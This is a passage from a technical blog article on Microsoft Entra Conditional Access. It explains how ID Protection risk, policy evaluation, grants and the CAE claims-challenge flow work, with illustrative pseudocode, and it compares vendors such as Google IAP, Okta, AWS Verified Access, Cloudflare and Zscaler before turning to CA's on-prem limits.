&lt;p&gt;The detection is mapped to a risk &lt;em&gt;level&lt;/em&gt;, not a probability. Microsoft Learn calls the level &quot;calculated by our machine learning algorithms&quot; and explicitly notes the meaning: low/medium/high &quot;represent how confident Microsoft is that one or more of the user&apos;s credentials are known by an unauthorized entity&quot; [@ms-risk-detection-types].&quot;Confidence&quot; here is meant in the everyday sense, not the strict statistical sense of a confidence interval. Microsoft has not published a calibration study that would let you map a &quot;high&quot; risk level to a frequentist probability of compromise.&lt;/p&gt;
&lt;p&gt;The figure you sometimes see in Microsoft marketing materials -- &quot;more than 100 trillion signals processed per day&quot; [@ms-managed-policies], or, in older sources, &quot;78 trillion&quot; [@ms-id-protection-overview] -- is the &lt;em&gt;aggregate signal volume across all tenants and product surfaces&lt;/em&gt;, not per-sign-in features per user. The article keeps the two carefully separate.&lt;/p&gt;
&lt;p&gt;Microsoft has not publicly disclosed the production model architecture, the feature vector size, or per-detection precision and recall. The 2021 Microsoft Security Blog interview with Maria Puertas Calvo describes the existence of the ML team and the operational scale (&quot;hundreds of terabytes every day&quot;) but stops well short of architecture details [@ms-puertas-calvo-interview]. The model class is publicly unspecified; the taxonomy and the operating output are both public.&lt;/p&gt;
&lt;h3&gt;6.2 How risk surfaces&lt;/h3&gt;
&lt;p&gt;Two parallel logs matter for risk. The Sign-in log is the universe: every interactive and non-interactive sign-in produces an entry. The &lt;code&gt;riskDetections&lt;/code&gt; log is the &lt;em&gt;sparse overlay&lt;/em&gt;: a &lt;code&gt;riskDetection&lt;/code&gt; is emitted only when a detection fires for the sign-in. Most sign-ins produce a Sign-in log entry with no corresponding &lt;code&gt;riskDetection&lt;/code&gt;. Only flagged sign-ins do [@ms-graph-riskdetection].&lt;/p&gt;
&lt;p&gt;This is a common source of confusion. It is tempting to assume &quot;ID Protection scored every sign-in,&quot; and in a sense it did -- the detectors ran -- but the &lt;em&gt;durable artefact&lt;/em&gt; exists only when at least one detector fired. To compute a per-sign-in distribution of risk you need to &lt;em&gt;join&lt;/em&gt; the Sign-in log with the riskDetections log and treat the unjoined rows as &quot;no risk flagged at the moment of issuance.&quot;&lt;/p&gt;
&lt;p&gt;There is one more wrinkle. The detection taxonomy on the Microsoft Learn concept page and the &lt;code&gt;riskEventType&lt;/code&gt; enum on the Graph schema are not perfectly aligned. The concept page lists &lt;code&gt;mcasImpossibleTravel&lt;/code&gt; and &lt;code&gt;authenticatorPhishing&lt;/code&gt; as named detection types; the Graph enum lists &lt;code&gt;impossibleTravel&lt;/code&gt; (without the &lt;code&gt;mcas&lt;/code&gt; prefix). The two surfaces sometimes use different value names for the same logical detection -- a UI display string versus a Graph enum value. Detection engineers writing KQL against the Sign-in logs should account for both.&lt;/p&gt;
&lt;h3&gt;6.3 How CA consumes risk&lt;/h3&gt;
&lt;p&gt;Conditional Access evaluation runs in a fixed order: assignments are checked first (does this sign-in match this policy at all?), then conditions (do all the condition predicates hold?), then grants (which controls are demanded?), then session controls (which token lifetime, sign-in frequency, persistent browser).&lt;/p&gt;
&lt;p&gt;The key semantic, repeated across the Microsoft Learn documentation: a &lt;em&gt;block&lt;/em&gt; grant in any policy matching the sign-in overrides any allow grant in any other policy. The policy plane is not just additive; it has an explicit precedence rule.&lt;/p&gt;

flowchart TD
    A[Sign-in request] --&amp;gt; B[First-factor auth]
    B --&amp;gt; C[Enumerate matching policies]
    C --&amp;gt; D{Any policy matches?}
    D -- No --&amp;gt; E[Default allow with token]
    D -- Yes --&amp;gt; F[Evaluate conditions per policy]
    F --&amp;gt; G{Block grant in any match?}
    G -- Yes --&amp;gt; H[Deny access return error]
    G -- No --&amp;gt; I[Aggregate required grants]
    I --&amp;gt; J{All grants satisfied?}
    J -- No --&amp;gt; K[Issue challenge MFA or device]
    J -- Yes --&amp;gt; L[Apply session controls]
    L --&amp;gt; M[Issue access token]
&lt;p&gt;The pseudocode below is a compressed restatement of that flow. It is not Microsoft source code; it is the algorithmic shape an admin should keep in their head when reading a policy or debugging a sign-in.&lt;/p&gt;
&lt;p&gt;{`
function evaluate(signin) {
  const matching = allPolicies.filter(p =&amp;gt;
    p.state !== &apos;disabled&apos; &amp;amp;&amp;amp;
    matchesAssignments(p.conditions, signin) &amp;amp;&amp;amp;
    matchesConditions(p.conditions, signin)
  );&lt;/p&gt;
&lt;p&gt;  // Block precedence: any block grant wins
  if (matching.some(p =&amp;gt; p.grantControls.builtInControls.includes(&apos;block&apos;))) {
    return { decision: &apos;DENY&apos;, reason: &apos;block grant matched&apos; };
  }&lt;/p&gt;
&lt;p&gt;  // Aggregate required grants across matching policies
  const requiredGrants = new Set();
  for (const p of matching) {
    for (const g of p.grantControls.builtInControls) requiredGrants.add(g);
    if (p.grantControls.authenticationStrength) {
      requiredGrants.add(&apos;authStrength:&apos; + p.grantControls.authenticationStrength.id);
    }
  }&lt;/p&gt;
&lt;p&gt;  const satisfied = [...requiredGrants].every(g =&amp;gt; signin.satisfies(g));
  if (!satisfied) {
    return { decision: &apos;CHALLENGE&apos;, missing: [...requiredGrants].filter(g =&amp;gt; !signin.satisfies(g)) };
  }&lt;/p&gt;
&lt;p&gt;  // Apply session controls (token lifetime, sign-in frequency, persistent browser)
  const session = mergeSessionControls(matching.map(p =&amp;gt; p.sessionControls));
  return { decision: &apos;ALLOW&apos;, session };
}&lt;/p&gt;
&lt;p&gt;const result = evaluate({
  user: &apos;&lt;a href=&quot;mailto:alice@contoso.com&quot; rel=&quot;noopener&quot;&gt;alice@contoso.com&lt;/a&gt;&apos;,
  app: &apos;Office365 Exchange Online&apos;,
  location: { ip: &apos;203.0.113.42&apos;, country: &apos;PT&apos; },
  device: { compliant: true, joinType: &apos;Entra&apos; },
  signInRisk: &apos;low&apos;,
  userRisk: &apos;none&apos;,
  satisfies(grant) {
    const mfa = [&apos;mfa&apos;, &apos;authStrength:phishingResistantMfa&apos;];
    return mfa.includes(grant) || grant === &apos;compliantDevice&apos;;
  },
});
console.log(JSON.stringify(result, null, 2));
`}&lt;/p&gt;
&lt;p&gt;Risk-based conditions require Entra ID P2 [@ms-id-protection-overview]. Without that licence, the &lt;code&gt;signInRiskLevels&lt;/code&gt; and &lt;code&gt;userRiskLevels&lt;/code&gt; arrays in a policy are ignored. The rest of the engine works the same.&lt;/p&gt;
&lt;h3&gt;6.4 The grants&lt;/h3&gt;
&lt;p&gt;Each policy declares a set of grants. The grants are &lt;em&gt;additive within a policy&lt;/em&gt; (all required to satisfy the policy) but the &lt;em&gt;block grant in any matching policy&lt;/em&gt; takes precedence over allow grants in any other policy. Here are the grants currently in the schema:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Grant&lt;/th&gt;
&lt;th&gt;What it requires&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;block&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Deny access.&lt;/td&gt;
&lt;td&gt;Always wins against allow grants.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;mfa&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Any MFA method registered for the user.&lt;/td&gt;
&lt;td&gt;The legacy generic-MFA grant; replaced in modern deployments by Authentication Strength.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;requireAuthenticationStrength&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A named bundle of acceptable methods.&lt;/td&gt;
&lt;td&gt;The modern grant. Built-in strengths include phishing-resistant [@ms-auth-strengths].&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;compliantDevice&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The device record has &lt;code&gt;isCompliant: true&lt;/code&gt;.&lt;/td&gt;
&lt;td&gt;Set by Intune or a third-party compliance partner.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;domainJoinedDevice&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Hybrid Azure AD joined device.&lt;/td&gt;
&lt;td&gt;Requires Entra Connect on-prem trust.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;approvedApplication&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Use an approved client app.&lt;/td&gt;
&lt;td&gt;A small allow-list of Microsoft mobile apps.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;compliantApplication&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;An app under an Intune App Protection Policy.&lt;/td&gt;
&lt;td&gt;Mobile app management.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;passwordChange&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;User must change their password.&lt;/td&gt;
&lt;td&gt;Used for password-leaked recovery.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;requireTermsOfUse&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;User must accept a terms-of-use document.&lt;/td&gt;
&lt;td&gt;Used for compliance and guest scenarios.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

A named, ordered bundle of acceptable authentication methods that a CA grant can demand. The three built-in strengths are *MFA strength* (any registered second factor), *Passwordless MFA strength* (no password used), and *Phishing-resistant MFA strength* (FIDO2 security key, Windows Hello for Business or a platform credential, or multifactor certificate-based authentication) [@ms-auth-strengths]. The phishing-resistant strength is the canonical modern grant for high-value access.
&lt;p&gt;The Authentication Strength grant is where the phishing-resistance story lives in 2026. A policy that demands the phishing-resistant strength refuses to accept TOTP or SMS or push as the second factor. Only credentials with cryptographic binding to the device or hardware token will satisfy the grant. That class of credential, by construction, cannot be replayed by an adversary-in-the-middle phishing kit -- because the underlying &lt;a href=&quot;https://paragmali.com/blog/webauthn-and-passkeys-on-windows-from-ctap-to-the-credential/&quot; rel=&quot;noopener&quot;&gt;WebAuthn&lt;/a&gt; ceremony is bound to the origin of the relying party.&lt;/p&gt;
&lt;h3&gt;6.5 The Windows-side handoff&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/inside-the-primary-refresh-token-the-cryptographic-seam-betw/&quot; rel=&quot;noopener&quot;&gt;PRT&lt;/a&gt; issuance is an interactive sign-in. It goes through CA like any other.&lt;/p&gt;

A long-lived refresh token issued to a Windows session at user sign-in to Entra-joined or hybrid-Entra-joined devices. The PRT is bound to the device&apos;s TPM where one is available, and it grants the user single sign-on to all CA-targeted apps from that Windows session. Issuance is subject to CA evaluation; if a CA policy demands compliant device, the device must already be marked `isCompliant` before the PRT is issued.
&lt;p&gt;The compliance state lands on the device object as &lt;code&gt;isCompliant&lt;/code&gt;. Intune (or a third-party MDM through Intune&apos;s compliance-partner API) writes that field after evaluating the device against a compliance policy: disk encrypted, OS patched, antivirus running, jailbreak detection clean, and so on. CA reads it on subsequent policy evaluations. If a policy requires &lt;code&gt;compliantDevice&lt;/code&gt; and the device object says &lt;code&gt;isCompliant: false&lt;/code&gt;, the grant is not satisfied.&lt;/p&gt;
&lt;p&gt;The operational seam to on-prem Active Directory runs the other direction. &lt;a href=&quot;https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/&quot; rel=&quot;noopener&quot;&gt;Kerberos&lt;/a&gt; and &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLM&lt;/a&gt; against on-prem domain controllers never consult Entra. The Microsoft Learn CA overview is explicit: CA is a &lt;em&gt;cloud control plane&lt;/em&gt;; on-prem authentication is outside its scope [@ms-ca-overview]. This is the limit Section 8 will name precisely.&lt;/p&gt;
&lt;h3&gt;6.6 CAE in session&lt;/h3&gt;
&lt;p&gt;The third plane. Wire format lives in two Microsoft Learn pages: the claims-challenge page [@ms-claims-challenge] and the app-resilience CAE page [@ms-app-resilience-cae].&lt;/p&gt;
&lt;p&gt;A client opts in to CAE by advertising the &lt;code&gt;cp1&lt;/code&gt; capability via the &lt;code&gt;xms_cc&lt;/code&gt; claim in token requests. In MSAL, that opt-in looks like &lt;code&gt;WithClientCapabilities(new[] { &quot;cp1&quot; })&lt;/code&gt; [@ms-app-resilience-cae]. The Microsoft Learn claims-challenge page says it cleanly: &quot;The only currently known value is &lt;code&gt;cp1&lt;/code&gt;&quot; [@ms-claims-challenge].&lt;/p&gt;
&lt;p&gt;When the policy plane sees a critical event after the token was issued, the resource API responds to the next call with &lt;code&gt;HTTP 401 Unauthorized&lt;/code&gt; and a &lt;code&gt;WWW-Authenticate&lt;/code&gt; header of the shape:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer authorization_uri=&quot;&amp;lt;entra-authorize-endpoint&amp;gt;&quot;, error=&quot;insufficient_claims&quot;, claims=&quot;&amp;lt;base64-encoded JSON&amp;gt;&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;claims&lt;/code&gt; value is a base64-encoded JSON object that the client passes verbatim to the token endpoint when acquiring a fresh token [@ms-claims-challenge][@ms-app-resilience-cae]. The IdP evaluates the embedded claims, runs CA again with the new context, and issues a new token (or refuses).&lt;/p&gt;

The HTTP wire format CAE uses to revoke a session mid-flight. A CAE-aware resource API returns `HTTP 401` with `WWW-Authenticate: Bearer error=&quot;insufficient_claims&quot;, claims=&quot;&quot;`. The client replays the base64 blob to Entra; Entra re-runs CA with the new context; the client receives a fresh token or a definitive refusal. The wire format is documented at [@ms-claims-challenge] and demonstrated at [@ms-app-resilience-cae].
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The CAE-aware capability is signalled by the &lt;em&gt;client&lt;/em&gt;, not by the &lt;em&gt;token&lt;/em&gt;. The client advertises &lt;code&gt;cp1&lt;/code&gt; via &lt;code&gt;xms_cc&lt;/code&gt;; the token&apos;s CAE-awareness shows up as its lifetime (up to 28 hours) and the resource API&apos;s willingness to issue a claims challenge. Folk knowledge that says &quot;look for a &lt;code&gt;cae&lt;/code&gt; claim in the JWT&quot; is incorrect.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Microsoft Learn CAE document enumerates five critical events: account disabled or deleted, password change or reset, MFA enabled by an administrator, administrator token revocation, and high user risk detected by ID Protection [@ms-cae-concept]. A parallel pathway, &lt;em&gt;Conditional Access policy evaluation&lt;/em&gt;, propagates network-location and policy changes to CAE-aware resource providers on the same channel. For IP-location changes the latency is &quot;instant&quot;; for everything else the ceiling is up to 15 minutes [@ms-cae-concept].&lt;/p&gt;

sequenceDiagram
    participant C as Client app
    participant R as Resource API CAE aware
    participant E as Entra token issuer
    participant P as ID Protection
    Note over C: Client holds long-lived CAE token
    C-&amp;gt;&amp;gt;R: GET messages with bearer token
    R-&amp;gt;&amp;gt;R: Token still cryptographically valid
    P-&amp;gt;&amp;gt;E: High user risk event for Alice
    E-&amp;gt;&amp;gt;R: Push critical event Alice high risk
    C-&amp;gt;&amp;gt;R: GET messages with bearer token again
    R-&amp;gt;&amp;gt;C: 401 WWW-Authenticate insufficient_claims claims base64
    C-&amp;gt;&amp;gt;E: Token request with claims blob and cp1 capability
    E-&amp;gt;&amp;gt;E: Re-run CA with new context
    E--&amp;gt;&amp;gt;C: New token or definitive refusal
    C-&amp;gt;&amp;gt;R: Retry with new token
&lt;p&gt;{`
// Simplified MSAL.js-shaped pseudocode for CAE opt-in and challenge handling
const ENTRA_AUTHORITY = &apos;&apos;;
const EXCHANGE_ENDPOINT = &apos;&apos;;
const MAIL_READ_SCOPE = &apos;&apos;;&lt;/p&gt;
&lt;p&gt;const msal = new PublicClientApplication({
  auth: { clientId: &apos;&apos;, authority: ENTRA_AUTHORITY },
});&lt;/p&gt;
&lt;p&gt;async function callExchange() {
  let token = await msal.acquireTokenSilent({
    scopes: [MAIL_READ_SCOPE],
    clientCapabilities: [&apos;cp1&apos;], // advertise CAE awareness
  });&lt;/p&gt;
&lt;p&gt;  let res = await fetch(EXCHANGE_ENDPOINT, {
    headers: { Authorization: &apos;Bearer &apos; + token.accessToken },
  });&lt;/p&gt;
&lt;p&gt;  if (res.status === 401) {
    const header = res.headers.get(&apos;WWW-Authenticate&apos;) || &apos;&apos;;
    const m = /claims=&quot;([^&quot;]+)&quot;/.exec(header);
    if (m) {
      // Replay the embedded claims to acquire a fresh token
      token = await msal.acquireTokenSilent({
        scopes: [MAIL_READ_SCOPE],
        claims: Buffer.from(m[1], &apos;base64&apos;).toString(&apos;utf8&apos;),
        clientCapabilities: [&apos;cp1&apos;],
      });
      res = await fetch(EXCHANGE_ENDPOINT, {
        headers: { Authorization: &apos;Bearer &apos; + token.accessToken },
      });
    }
  }&lt;/p&gt;
&lt;p&gt;  console.log(&apos;HTTP&apos;, res.status);
}&lt;/p&gt;
&lt;p&gt;callExchange();
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; CAE inverts the conventional trade-off: lengthen the token, shorten the revocation. The token can live 28 hours because revocation is an event, not a clock.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The chain is now visible. The signal plane scored Alice&apos;s Tuesday sign-in. The policy plane evaluated the policies. The token issuer issued an access token (CAE-aware because Outlook advertises &lt;code&gt;cp1&lt;/code&gt;). Exchange Online accepted the token and returned mail. If, twelve minutes from now, Alice&apos;s account is flagged high risk because a different sign-in attempt fires &lt;code&gt;leakedCredentials&lt;/code&gt;, the critical event will fire, Exchange will issue a claims challenge, and Outlook will either acquire a fresh token (passing the new CA evaluation) or surface the refusal to the user.&lt;/p&gt;
&lt;p&gt;Six independent components co-decided on one access event. Microsoft is one vendor. The same problem has been solved differently by Google, Okta, AWS, Cloudflare, and Zscaler. The Microsoft answer is not the only correct answer.&lt;/p&gt;
&lt;h2&gt;7. How others do it&lt;/h2&gt;
&lt;p&gt;Microsoft chose to enforce at &lt;em&gt;token issuance and claims challenge&lt;/em&gt;. Google chose to enforce at &lt;em&gt;every HTTP request via a reverse proxy&lt;/em&gt;. AWS chose a decidable policy DSL. These are not minor variations; they are different answers to &quot;where does the policy engine live in the data path?&quot;&lt;/p&gt;
&lt;p&gt;Both Microsoft&apos;s and Google&apos;s models scale. Neither is strictly better. The choice is a function of what the enterprise already runs.&lt;/p&gt;
&lt;h3&gt;Google BeyondCorp, IAP, Chrome Enterprise Premium&lt;/h3&gt;
&lt;p&gt;Google&apos;s Identity-Aware Proxy puts the policy engine in the data path. The documentation calls it bluntly: &quot;IAP lets you establish a central authorization layer for applications accessed by HTTPS, so you can use an application-level access control model instead of relying on network-level firewalls&quot; [@google-iap]. Every HTTP request to an IAP-protected app passes through the proxy. The proxy authenticates the user (via Google Account, Workforce Identity Federation, or Identity Platform), evaluates a Common Expression Language policy against the request context, and -- on allow -- forwards the request to the backend with signed identity headers.&lt;/p&gt;
&lt;p&gt;The BeyondCorp Enterprise product (recently rebranded as Chrome Enterprise Premium) layers context-aware access on top: device posture, geographic location, time of day [@google-bce-overview]. The architecture matches the 2014 USENIX paper [@ward-beyer-2014-beyondcorp] and the 2016 production follow-up [@osborn-2016-beyondcorp].&lt;/p&gt;
&lt;p&gt;The strength is per-request authorization: every HTTP call is its own decision point. The weakness, from the M365 perspective, is that IAP does not gate Microsoft 365 first-party API traffic. The Outlook client does not route through Google&apos;s IAP; it routes through Entra and Exchange Online. For Microsoft 365 workloads, IAP is complementary at best.&lt;/p&gt;
&lt;h3&gt;Okta Identity Engine and ThreatInsight&lt;/h3&gt;
&lt;p&gt;Okta&apos;s policy engine is closer to Microsoft&apos;s structurally: the identity provider is the policy engine, app sign-on policies live on the IdP, and the resource side relies on the IdP&apos;s token rather than a per-request proxy. The Okta Identity Engine documents the rule shape: &quot;App sign-in policies define how a user must authenticate to gain access to an app. They verify ... group membership, the IP zone they&apos;re signing in from, risk level, and others&quot; [@okta-sign-on-policies]. Every new app gets a default policy with a single catch-all rule that allows access with two factors.&lt;/p&gt;
&lt;p&gt;Okta ThreatInsight is the IP-reputation feed. The documentation describes it operationally: &quot;Okta ThreatInsight aggregates data about sign-in activity across the Okta customer base to analyze and detect potentially malicious IP addresses ... password spraying, credential stuffing, brute-force cryptographic attacks&quot; [@okta-threatinsight]. The signal coverage is narrower than ID Protection: ThreatInsight is IP-centric, where ID Protection runs a multi-detection ML pipeline on tokens, sessions, behaviour, and credentials.&lt;/p&gt;
&lt;h3&gt;AWS IAM Identity Center and Verified Access&lt;/h3&gt;
&lt;p&gt;AWS splits the problem. IAM Identity Center handles workforce SSO and trusted identity propagation to AWS services [@aws-iam-identity-center]. AWS Verified Access handles per-request authorization for HTTPS-fronted apps -- the ZTNA piece. The Verified Access docs put it plainly: &quot;Verified Access evaluates each application access request in real time&quot; and &quot;verifies the trustworthiness of users and devices against a set of security requirements&quot; [@aws-verified-access].&lt;/p&gt;
&lt;p&gt;The interesting bit is the policy language: Cedar. Cedar is a deliberately decidable language for authorization policy. &quot;Decidable&quot; here is a precise term: the safety question (will some policy edit, in some future edit chain, leak this right?) is answerable by a static analyser for any Cedar policy [@cedar-security].&lt;/p&gt;
&lt;p&gt;Cedar&apos;s intentional non-Turing-completeness is the language-design hedge against the Harrison-Ruzzo-Ullman undecidability result the next section will name. The trade-off is expressiveness: Cedar cannot express arbitrary computational predicates, which is the price of being analysable [@cedar-security].&lt;/p&gt;
&lt;h3&gt;Cloudflare Access and Zscaler Private Access&lt;/h3&gt;
&lt;p&gt;Cloudflare Access is an edge proxy. Policies are deny-by-default, with four building blocks: Actions (Allow, Block, Bypass, Service Auth), Rule types (Include, Require, Exclude), Selectors, and Values [@cloudflare-access-policies]. The deny-by-default semantics are explicit: &quot;Since Access is deny by default, users who do not match a Block policy will still be denied access unless they explicitly match an Allow policy&quot; [@cloudflare-access-policies]. Cloudflare also ships a policy tester that lets administrators dry-run a policy against the existing user population [@cloudflare-access-policy-mgmt].&lt;/p&gt;
&lt;p&gt;Zscaler Private Access is a broker-based ZTNA: the user connects to a Zscaler edge node, the broker establishes a connection to the private app, and &quot;users never access the corporate network, and apps are never exposed to the public internet&quot; [@zscaler-zpa]. Zscaler&apos;s own marketing surveys put the VPN-replacement framing in numbers: &quot;91% of organizations are concerned that VPNs compromise their security&quot; and &quot;56% of organizations suffered one or more VPN-related attacks in 2023-2024&quot; [@zscaler-zpa].&lt;/p&gt;
&lt;p&gt;Architecturally, Cloudflare Access and ZPA both sit closer to BeyondCorp than to Microsoft CA: the policy engine is in the data path; the protected resource is fronted by the proxy rather than gated at token issuance.&lt;/p&gt;
&lt;h3&gt;OpenID Shared Signals Framework and CAEP&lt;/h3&gt;
&lt;p&gt;Not a competitor: the &lt;em&gt;cross-vendor wire format&lt;/em&gt; for what Microsoft built into CAE. On 22 September 2025, the OpenID Foundation approved three Final Specifications: the Shared Signals Framework 1.0, the Continuous Access Evaluation Profile 1.0, and the Risk Incident Sharing and Coordination Profile 1.0 [@helpnet-2025-openid][@openid-caep-final]. CAEP defines five event types -- Session Revoked, Token Claims Change, Credential Change, Assurance Level Change, Device Compliance Change -- as the cross-vendor revocation vocabulary.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s CAE implementation is, in Microsoft&apos;s own words, &quot;an industry standard based on Open ID Continuous Access Evaluation Profile&quot; [@ms-cae-concept]. The Final Specifications from September 2025 are the canonical post-2025 reference; older drafts at OpenID&apos;s site are superseded.&lt;/p&gt;
&lt;h3&gt;Head-to-head comparison&lt;/h3&gt;
&lt;p&gt;The differences worth memorising:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;System&lt;/th&gt;
&lt;th&gt;Enforcement point&lt;/th&gt;
&lt;th&gt;Native risk feed&lt;/th&gt;
&lt;th&gt;Post-issuance revocation&lt;/th&gt;
&lt;th&gt;Gates M365 first-party?&lt;/th&gt;
&lt;th&gt;Best suited for&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Microsoft Entra CA + ID Protection + CAE&lt;/td&gt;
&lt;td&gt;Token issuer + CAE-aware resource APIs&lt;/td&gt;
&lt;td&gt;ID Protection ML pipeline&lt;/td&gt;
&lt;td&gt;CAE up to 15 min, instant for IP&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;M365 tenants&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Google IAP / Chrome Enterprise Premium&lt;/td&gt;
&lt;td&gt;HTTPS reverse proxy&lt;/td&gt;
&lt;td&gt;Context-aware access signals&lt;/td&gt;
&lt;td&gt;Per-request (always re-decides)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Google Cloud workloads&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Okta Identity Engine + ThreatInsight&lt;/td&gt;
&lt;td&gt;IdP token issuance&lt;/td&gt;
&lt;td&gt;ThreatInsight IP feed&lt;/td&gt;
&lt;td&gt;Limited, IdP-dependent&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Vendor-neutral front door&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AWS IAM Identity Center + Verified Access&lt;/td&gt;
&lt;td&gt;Verified Access proxy + IAM&lt;/td&gt;
&lt;td&gt;Trust providers (third-party)&lt;/td&gt;
&lt;td&gt;Per-request for Verified Access&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;AWS-hosted apps&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cloudflare Access&lt;/td&gt;
&lt;td&gt;Edge proxy&lt;/td&gt;
&lt;td&gt;Risk score + identity factors&lt;/td&gt;
&lt;td&gt;Per-request&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Public web apps&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Zscaler Private Access&lt;/td&gt;
&lt;td&gt;Broker / edge node&lt;/td&gt;
&lt;td&gt;Posture + identity&lt;/td&gt;
&lt;td&gt;Per-request&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Private app access&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Per-cell sourcing for the table: the Microsoft row&apos;s &quot;Yes&quot; cell on M365 first-party gating is the directly-stated claim from the Microsoft Learn CA overview [@ms-ca-overview]. The other rows&apos; &quot;No&quot; cells are &lt;em&gt;negative inferences&lt;/em&gt; drawn from each peer&apos;s own product documentation, none of which advertises Microsoft 365 first-party API gating: Google IAP gates HTTPS-fronted apps behind the proxy [@google-iap]; Cloudflare Access deny-by-default applies to the apps fronted by Cloudflare [@cloudflare-access-policies]; Verified Access &quot;evaluates each application access request&quot; for HTTPS apps behind AWS [@aws-verified-access]; Zscaler ZPA brokers private app access [@zscaler-zpa]; Okta sign-on policies gate apps wired into Okta&apos;s IdP [@okta-sign-on-policies]. The cell semantics are &quot;does the system gate Outlook/Teams/SharePoint/Graph first-party traffic&quot; and the answer is structurally No outside Microsoft.&lt;/p&gt;

flowchart LR
    subgraph TOK[Token issuance model Microsoft Okta]
        U1[User] --&amp;gt; AT[Acquire token]
        AT --&amp;gt; CA1[CA evaluator]
        CA1 --&amp;gt; IS[Issue token]
        IS --&amp;gt; R1[Resource API validates token]
        R1 -. CAE 401 .-&amp;gt; AT
    end
    subgraph PRX[Data path proxy model Google BeyondCorp AWS Verified Access Cloudflare Zscaler]
        U2[User] --&amp;gt; PXY[Proxy intercepts every request]
        PXY --&amp;gt; POL[Policy evaluator at the proxy]
        POL --&amp;gt; BCK[Backend application]
    end
&lt;p&gt;The honest observation worth sitting with: none of the proxy systems gates M365 first-party API traffic. Outlook, Teams, SharePoint, and Microsoft Graph route through Entra. For those workloads, Entra remains the only effective policy plane. The proxy systems gate &lt;em&gt;the apps that sit behind the proxy&lt;/em&gt; -- internal apps, partner-facing apps, custom workloads. That makes BeyondCorp, Okta, Cloudflare Access, and ZPA &lt;em&gt;complementary to&lt;/em&gt; Entra CA in an M365 environment, not substitutes for it.&lt;/p&gt;
&lt;p&gt;Six systems, six architectural choices. None of them wrong. But what do they &lt;em&gt;all&lt;/em&gt; leave on the table?&lt;/p&gt;
&lt;h2&gt;8. What Conditional Access fundamentally cannot do&lt;/h2&gt;
&lt;p&gt;Section 7 cannot be the ending. There are at least five things Conditional Access -- and every peer in Section 7 -- &lt;em&gt;cannot&lt;/em&gt; do. Some are engineering limits; some are theorems. Both classes are worth naming.&lt;/p&gt;
&lt;h3&gt;(a) On-prem authentication&lt;/h3&gt;
&lt;p&gt;CA is a cloud control plane. Kerberos and NTLM against on-prem domain controllers do not consult Entra. There is no policy hook for the legacy Windows protocols. If a domain user signs in to a domain-joined workstation, authenticates to a file server, and accesses a share, no piece of that flow touches Conditional Access. The Microsoft Learn overview is explicit about the scope [@ms-ca-overview].&lt;/p&gt;
&lt;p&gt;This is the operational seam between cloud identity and on-prem identity. State it plainly; do not soften.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Conditional Access does not gate Kerberos or NTLM against on-prem domain controllers. If your threat model includes lateral movement after credential theft on the on-prem side, CA is not your defence. Layer in Defender for Identity, on-prem MFA gateways, or a privileged-access workstation architecture instead.&lt;/p&gt;
